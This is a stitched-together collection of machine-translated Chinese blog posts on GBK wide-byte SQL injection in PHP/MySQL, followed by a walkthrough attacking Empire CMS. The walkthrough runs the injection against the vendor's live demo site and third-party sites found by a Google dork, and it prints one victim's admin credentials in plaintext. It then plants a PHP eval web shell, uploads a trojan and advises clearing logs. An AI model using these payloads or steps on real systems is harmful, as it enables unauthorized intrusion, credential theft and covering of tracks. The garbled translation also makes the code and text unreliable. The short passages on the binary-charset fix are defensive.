Wide byte (wide character) Injection

From: http://hi.baidu.com/_ccsec/blog/item/295157238e75fa33d40742b0.html

Byte injection is also a problem found in recent projects. We all know that % DF is escaped by PHP (with GPC enabled, using the addslashes function, or icov), with a backslash \, % DF \ 'is changed, and the hexadecimal value of \ is % 5c. % DF \' = % DF % 5c % 27, if the default Character Set of the program is the GBK equal-width Byte Character Set, MySQL considers % DF % 5c as a wide character, that is, when using GBK encoding, that is: % DF \ '= % DF % 5c % 27 = comment'. It is injected with single quotes. For example:

$ Conn = mysql_connect ("localhost", "root", "2sdfxedd"); mysql_query ("set names 'gbk'"); mysql_select_db ("test", $ conn ); $ user = mysql_escape_string ($ _ Get ['user']); $ pass = mysql_escape_string ($ _ Get ['pass']); $ SQL = "select * From cms_user where username = '$ user' and Password =' $ pass'"; $ result = mysql_query ($ SQL, $ conn ); while ($ ROW = mysql_fetch_array ($ result, mysql_assoc) {$ rows [] = $ row ;}?>

Run the following injection:

Http://www.xxx.com/login.php? User = % DF '% 20or % 201 = 1% 20 limit % ,,1% 23 & pass =

The corresponding SQL statement is:

Select * fromcms_user where username = 'run' or 1 = 1 limit 1, 1 # 'and Password ="

Solution: after the connection and character set are initialized, use setcharacter_set_client = binary to set the character set of the client to binary. For example:

Mysql_query ("set character_set_client = binary ");

========================================================== ======================================

 

PHP's experiment on wide byte encoding

Http://hi.baidu.com/kashifs/blog/item/385b004410c5a1186a63e51a.html

2010/12/01 06:06 p. M.

In the past, the wide byte still stayed on get. Thanks to an article by toby57, I went into depth.

GPC Enabled

Submit: Pipeline '); phpinfo ();//

Conversion: Pipeline \ '); phpinfo ();//

 

<? PHP

$ Config = array ('prop \ '); phpinfo ();//');

?>

PHP started to process: D5 5C 5C 27..., first handle the escape, \ has no special effect, changed to D5 \'..., Start to execute: quota'..., single quotation marks, phpinfo execution.

Write shell if you are lucky? Post commit injection?

Set character_set_connection = $ dbcharset, character_set_results = $ dbcharset, character_set_client = binary

The first two statements prevent garbled characters, and the last one prevents wide-byte injection.

Toby57:

When character_set_client is GBK, special characters are introduced only when character_set_client is binary.

Iconv ('gbk', 'utf-8', $ _ Get ['para']); // convert the code from GBK to UTF-8

Test. php? Para = A % E5 % 27

You can introduce CHR (39) at the end'

$ Username = iconv ('utf-8', 'gbk', $ _ Get ['para']); // convert from UTF-8 encoding to GBK

Test. php? Para = A % E9 % 8C % A6

You can introduce CHR (92) at the end, that is \

========================================================== ======================================

 

Test the wide character

I have always felt that I do not have a thorough understanding of the causes of these vulnerabilities. Today I have used some simple tests.

<? PHP // magic_quote_gpc = on $ conn = mysql_connect ('2017. 0.0.1 ', 'root', 'root'); mysql_select_db ('mysql', $ conn); mysql_query ("set character_set_client = 'binary '") or die (mysql_error (); // mysql_query ("set character_set_client = 'gbk'") or die (mysql_error ()); // $ username = mb_convert_encoding ($ _ Get ['para'], 'utf-8', 'gbk'); // $ username = iconv ('gbk ', 'utf-8', $ _ Get ['para']); $ username = iconv ('utf-8', 'gbk', $ _ Get ['Para']); // $ username = stripslashes ($ _ Get ['para']); $ querystr = "select host from user where user = '{$ username}'"; echo $ querystr. "<br/>"; if ($ res = mysql_query ($ querystr) {echo "OK .. <br/> ";} else {echo" bad .. :::". mysql_error (). "<br/>";} echo dumpstr ($ username); function dumpstr ($ string) {$ tmpstr = ''; For ($ I = 0; isset ($ string [$ I]); $ I ++) {$ tmpstr. = "CHR (". ord ($ string [$ I]). "). ";} return SUBST R ($ tmpstr, 0,-1) ;}?>

When character_set_client is GBK, special characters are introduced only when character_set_client is binary.

Iconv ('gbk', 'utf-8', $ _ Get ['para']); // convert the code from GBK to UTF-8

Test. php? Para = A % E5 % 27

You can introduce CHR (39) at the end '.

$ Username = iconv ('utf-8', 'gbk', $ _ Get ['para']); // convert from UTF-8 encoding to GBK

Test. php? Para = A % E9 % 8C % A6

You can introduce CHR (92) \ at the end \.

========================================================== ======================================

 

Or a wide character ..

Today, I found the previous misunderstanding of mysql_real_escape_string. I thought it would be safe to add real_escape to set names GBK. The result is not like this. real_escape will be encoded according to the character set currently connected, however, only set names does not change the character set. The test is as follows:

Return

To notify PHP to change the current connection character set, you must use mysql_set_charset () to make a simple record.

Refer:

Http://www.laruence.com/2010/04/12/1396.html

Http://www.mirecle.com/2010/04/13/php-in-the-set-names-and-mysql_set_charset.html

Http://topic.csdn.net/u/20090202/10/bc90e3a2-660b-443d-b1d0-6a644601bdd6.html

========================================================== ======================================

 

I read this article from bhst today.

Http://www.bhst.org/viewthread.php? Tid = 1382 & extra = Page % 3d1

I learned something about wide character injection.

PHP uses the php_escape_shell_cmd function to escape the command line string and process it as a single byte. When the operating system sets the wide byte character set such as GBK, EUC-KR, and sjis, these command line strings are passed to MySQL for multi-byte processing.

For example:

Http: // localhost/GBK. php? Username = % DF % 27 // multibyte encoding

% DF % 27 = '// check that the single quotation mark is provided, and the subsequent structure can be constructed.

Http: // localhost/test/B. php? Username = % DF % 27 or1 % 23

The SQL statement is similar to this: Select * fromdemo where username = 'run' or 1 # 'limit 1

This will allow injection.

In the PHP processing process, it is single-byte processing, it only treats the input as a byte stream, and when Linux sets the GBK character set, its processing is dual-byte, which is obviously different from everyone's understanding. We can check that the GBK character set range is 8140-fefe, the first byte is between 81-fe, the last byte is between 40-fe, and a very important character \ is encoded as 5C,

The result is:

Addslashes, mysql_escape_string,

In addition, magic_quotes_gpc of PHP. ini cannot filter the single quotation marks produced by the wide byte, and the injection is coming.

Now, the fix is to set the client's character set to binary,

Similar to this:

Mysql_query ("setcharacter set 'gbk'", $ conn); // insecure mysql_query ("setcharacter_set_connection = GBK, rows = GBK, character_set_client = binary", $ conn ); // safe

Of course, this is not easy to worry about, but you need to note that in the following usage, do not convert the user input into code,

Because once converted, the width character comes again. The binary data written above can only be GBK. If you convert it to UTF-8, isn't the width character coming again.

 

Note that if you want to dig holes, you should also pay attention to the ecshop 2.6.x/2.7.x GBK vulnerability.

========================================================== ======================================

 

Analysis on the CMS system Injection Vulnerability

Before introducing this vulnerability, it is necessary to clarify the concept of wide byte injection. Wide-byte injection is relative to single-byte injection. Single-byte injection is usually used to recover SQL statements after URLs with parameter IDs for injection. For example: http://www.hackest.cn/article.php? Id = 1and 1 = 1 /*

Http://www.hackest.cn/article.php? Id = 1and 1 = 2 /*

This classic example of determining whether a target has been injected is single-byte injection.

It seems that I haven't seen any usage yet. Anyone familiar with PHP + MySQL injection should understand that single quotes are definitely a good thing in injection. In particular, many programmers rely too much on the escape of functions such as magic_quotes_gpc, addslashes, and iconv. Theoretically, as long as the database connection code is configured with GBK encoding or the default encoding is GBK, injection vulnerabilities are everywhere in the current program. In fact, this transformation has also played a huge role in XSS and other fields. When PHP + LINUX background programs are combined, it may also cause command injection, that is to say, you can directly execute Linux system commands at the injection point. For example, the Code for logging on to the login. php file is as follows:

 

<? PHP $ conn = mysql_connect ("localhost", "root", "hackest"); mysql_query ("set names 'gbk'"); mysql_select_db ("test", $ conn ); $ user = mysql_escape_string ($ _ Get ['user']); $ pass = mysql_escape_string ($ _ Get ['pass']); $ SQL = "select * From cms_user where username = '$ user' and Password =' $ pass'"; $ result = mysql_query ($ SQL, $ conn ); while ($ ROW = mysql_fetch_array ($ result, mysql_assoc) {$ rows [] = $ row ;}?>

The following statements can be constructed for injection:

Http://www.hackest.cn/login.php? User = % DF '% 20or % 201 = 1% 20 limit % ,,1% 23 & pass =

% 20 is the URL encoding of space, % 23 is the URL encoding of #, one of the MySQL annotators. The corresponding SQL statement is:

Select * fromcms_user where username = 'run' or 1 = 1 limit 1, 1 # 'and Password ="

 

Bytes ---------------------------------------------------------------------------------------

The above content is taken from the Internet. After analysis, it is used to describe the problem. The source is unknown. Thank you to your predecessors. ^-^

Bytes ---------------------------------------------------------------------------------------

 

Ii. Practice

 

The theory is almost ready. It's time to come to the actual point. This time, let's take the Emperor CMS as an example. Diguo CMS is known as the safest and most stable open-source CMS (Content Management System ). Part of the Code in this document is as follows:

 

// Permission if ($ GBR ['groupid']) {include (".. /.. /class/user. PHP "); $ user = islogin (); Include (".. /.. /class/memberlevel. PHP "); if ($ level_r [$ GBR [groupid] [level]> $ level_r [$ user [groupid] [level]) {echo "<SCRIPT> alert ('your membership level is insufficient (". $ level_r [$ GBR [groupid] [groupname]. "), no permission to submit information! '); History. go (-1); </SCRIPT> "; exit () ;}} esetcookie (" gbookbid ", $ bid, 0 ); $ bname = $ GBR ['bname']; $ search = "& bid = $ bid"; $ page = (INT) $ _ Get ['page']; $ start = (INT) $ _ Get ['start']; $ line = 12; // number of entries displayed on each page $ page_line = 12; // The number of links displayed on each page $ offset = $ start + $ page * $ line; // The total offset $ totalnum = (INT) $ _ Get ['totalnum']; if ($ totalnum) {$ num = $ totalnum;} else {$ totalquery = "select count (*) as total from {$ dbtbpre} enewsgbook where Bid = '$ bid' And checked = 0 "; $ num = $ empire-> gettotal ($ totalquery); // get the total number of results} $ search. = "& totalnum = $ num"; $ query = "select lyid, name, email, 'call', lytime, lytext, retext from {$ dbtbpre} enewsgbook where Bid = '$ bid' and checked = 0 "; // hackest Note: The key is this sentence. How is it similar to the above example! $ Query = $ query. "order by lyid DESC limit $ offset, $ line"; $ SQL = $ empire-> query ($ query); $ listpage = page1 ($ num, $ line, $ page_line, $ start, $ page, $ search); $ url = "<a href = .. /.. /.. /.. /> ". $ fun_r ['index']. "</a> ". $ fun_r ['saygbook'];?>

Note comments! Author: hackest [h.s. T.]

Note comments! Take the official test directly, and I will not be involved in this machine. Official demonstration site: http://demo.phome.net/. In other words, the interface is quite refreshing, so many Webmasters can use it. Go straight to the message page: http://demo.phome.net/e/tool/gbook? Bid = 1. Be sure to bring bid = 1 (I downloaded the latest version of the Empire CMS, and the index is under the E/tool/gbook directory. PHP file, directly access it with an error prompt, and jump to the previous page ). Then drop down to "Please leave your words:" and fill in the relevant information as follows:

Name: 123 bytes \

Email:, 1, (selectconcat (username, 0x5f, password, 0x5f, RND) from phome_enewsuser whereuserid = 1 )/*

Contact number: Write it as needed

Message content: Write it as needed

 

2

 

 

After you submit the file, you can see the burst user name, password MD5, and RND value. 3.

 

 

Wm_chief is a programmer who develops CMS. Because it has been submitted several times and cannot be deleted in the background, there are multiple records. After the password is cracked, you can log on to the background in plain text. However, the official demonstration site does not have the database operation permission. Any operations involving the database will prompt:

 

Online demonstration only allows viewing, and database-related operations are forbidden by administrators!

If your browser does not automatically Jump, click here

 

However, this MD5 cannot be found in online queries, and the plaintext is cracked using the MD5 rainbow table, which will be shown later. This background is just for you to see. By the way, you can experience its powerful functions (the official demo administrator username and password are both admin and can also be logged on, but they cannot be operated ), there was no unexpected result when I took the password to the social worker as an administrator. I was unable to access the blog, forum, mailbox, official site FTP, official site 3389, etc, therefore, webshell cannot be implemented officially.

Iii. Substitutes

 

If the official website does not enter, find a scapegoat. Google uses the keyword "inurl: E/tool/gbook /? Bid = 1 "search, 99% of the sites found are using the Empire CMS. You can find one and test it to prove that the vulnerability exists.

 

 

The hateful thing is that the MD5 value cannot be queried online, and you have to start the rainbow table to run. Let's just start the official MD5. After dinner, the result will come out, 5.

 

 

If you are interested in the development of the network security industry, rainbow tables are still indispensable. What is a rainbow table? It is a huge set of hash values pre-computed for various possible letter combinations, not necessarily for MD5 algorithms, it can quickly crack various types of passwords. The more complex the password is, the larger the rainbow table is. Currently, the mainstream rainbow tables are more than GB.

 

The backend address is E/admin/by default /. Username: joycar, password: zuxywz119, by the way, go to the background, 6.

 

 

How can I get webshell after entering the background? Add the upload suffix. I tried it and it is not feasible. I searched for relevant information online, and it was tricky to manage templates. Go to the background> template Management> Custom page> Add custom page. You can enter either the Page name or the file name. You can enter the specified path in the file name. The following code is written in the page content:

 

<\? Phpeval ($ _ post [cmd]);? \>

 

What is the common PHP code for a trojan? PHP eval ($ _ post [cmd]);?>, CMD is the password. However, you must add \ before and after the preceding requirements. If you do not add it, it will not succeed. It is very important. Remember it! Click Submit, and then return to the Management User-Defined page. Click the name of the page you just clicked to directly jump to E/admin/template/hackest. PHP: The page cannot be found. The path is incorrect. Of course, it cannot be found. Change it to E/admin/hackest. PHP, visit again, a blank space, a bit of happiness in the heart, a bit of drama ...... 7. Figure 8.

 

 

 

Use the Lanker micro PHP + ASP manager 1.0 dual-use version to connect a sentence, submit the environment variables to see, 9.

 

 

Upload another PHP Trojan and you will be done. It is a Linux system, and the release version is Red Hat Enterprise Linux as Release 4, which has overflow protection and cannot be raised. 10.

 

 

Remember to delete the comment that broke the username and password, delete the custom page you added, and process the background logs. Many people do not know what logs are called cleanup. In fact, they are trying to delete the relevant records of your operations as much as possible. For example, if you log on to 3389, system logs will be recorded. For example, if you log on to FTP, application logs will also be recorded. For example, if you inject attacks to this website, IIS or other Web applications will also record ...... Skilled administrators can analyze the details of your attack methods, attack sources, and other information from these logs. The security work must be well done and never be careless.

 

Iv. Repair

 

Although the official website has been exploding for a while, it does not seem to attract enough attention, as of the press date, no official solutions have been found to fix this vulnerability (in fact, it cannot be completely the mistake of the Empire CMS, and the encoding problem has been quite fierce recently -_-).

 

Solution: after the connection and character set are initialized, set character_set_client = binary is used to set that the character set of the client is binary. Modify the MySQL configuration file in Windows. The MySQL configuration file in Linux is generally my. CNF, for example, mysql_query ("setcharacter_set_client = binary ");. Character_set_client specifies the encoding of the SQL statement. If it is set to binary, MySQL runs in binary format, so that the wide-byte encoding problem is useless.

 

 

Everyone knows that when PHP enables magic_quotes_gpc or uses functions such as addslashes and iconv, single quotes (') are converted \'. For example, if % BF meets the preceding conditions, it will become % BF \'. The hexadecimal code of the backslash (\) is % 5c, And the hexadecimal code of the single quotation mark (') is % 27, then % BF \ '= % BF % 5c % 27 can be obtained. If the default Character Set of the program is GBK equal-width Byte Character Set, MySQL considers % BF % 5c as a wide character, that is, "bytes ". That is, % BF \ '= % BF % 5c % 27 = hangzhou '. % BF is not a unique character. It can be any character between % 81-% Fe. Not very easy to understand, we use Xiao Kui to write a character to convert small
Tool to convert, 1.

 

Open google with the keyword inurl: E/tool/gbook /? Bid = 1.

The searched message book is actually a vulnerability in the message book.

Enter your name and email address.

Your name: Taobao \

Email:, 1, (select Concat (username, 0x5f, password, 0x5f, RND) fromphome_enewsuser where userid = 1 )/*

Then, the user name and password are displayed. If the password is good, the system enters the website background after the password is cracked. The background address is E/admin/

Next, use shell to go to the background and click "template management" at the top. Then the custom page on the left-Add a custom page, and fill in a PHP sentence in the page content, <\? PHP eval ($ _ post [cmd]);? \> Now, go back to the Management User-Defined page and click the name of the page you just created. The page jumps directly to E/admin/template/X. php and prompts that the page cannot be found. Remove the template. The actual address is E/admin/X. php. If a blank area is displayed, the operation is successful.

Finally, use the Lanker micro PHP + ASP dual-use version to connect a sentence.

Tip: Don't worry. You can change the custom page content to ASP.